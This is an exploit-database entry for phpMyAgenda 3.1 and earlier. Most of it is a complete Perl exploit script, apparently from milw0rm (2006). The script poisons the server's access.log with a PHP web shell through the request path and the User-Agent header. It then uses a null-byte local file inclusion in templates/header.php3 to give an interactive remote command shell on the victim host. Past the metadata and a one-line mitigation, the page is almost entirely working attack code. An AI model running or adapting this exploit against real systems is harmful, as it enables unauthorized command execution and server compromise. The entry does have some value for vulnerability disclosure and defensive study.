phpMyAgenda < 3.1 Multiple Remote Vulnerabilities Exploit

vendor:

phpMyAgenda

by:

Nima Salehi

7,5

CVSS

HIGH

Multiple Remote Vulnerabilities

N/A

CWE

Product Name: phpMyAgenda

Affected Version From: 3.1 and below

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

phpMyAgenda < 3.1 Multiple Remote Vulnerabilities Exploit

This exploit allows an attacker to inject malicious code into the access.log file of the phpMyAgenda application. This code can then be used to execute arbitrary commands on the vulnerable system.

Mitigation:

Upgrade to the latest version of phpMyAgenda, or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;
use LWP::Simple;

print "\n";
print "#################################################################\n";
print "#                                                               #\n";
print "# phpMyAgenda < 3.1 Multiple Remote Vulnerabilities Exploit     #\n";
print "# Bug found By : Ashiyane Corporation                           #\n";
print "# Email: Nima Salehi    nima[at]ashiyane.ir                     #\n";
print "# Web Site : www.Ashiyane.ir                                    #\n";
print "#                                                               #\n";
print "#################################################################\n";


if (@ARGV < 3)
{
    print "\n Usage: Ashiyane.pl [host] [path] [access.log path]";
    print "\n EX : Ashiyane.pl www.victim.com /phpMyAgenda/ ../../../logs/access.log \n\n";
exit;
}


$host=$ARGV[0];
$path=$ARGV[1];
$accpath=$ARGV[2];


print "Injecting some code in log files...\n";

$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die " Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);


print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";
print "IF not working try another access.log path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";

    print $socket "GET ".$path."templates/header.php3?language=".$accpath."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[shell] ";
    $cmd = <STDIN>;
}

# milw0rm.com [2006-10-10]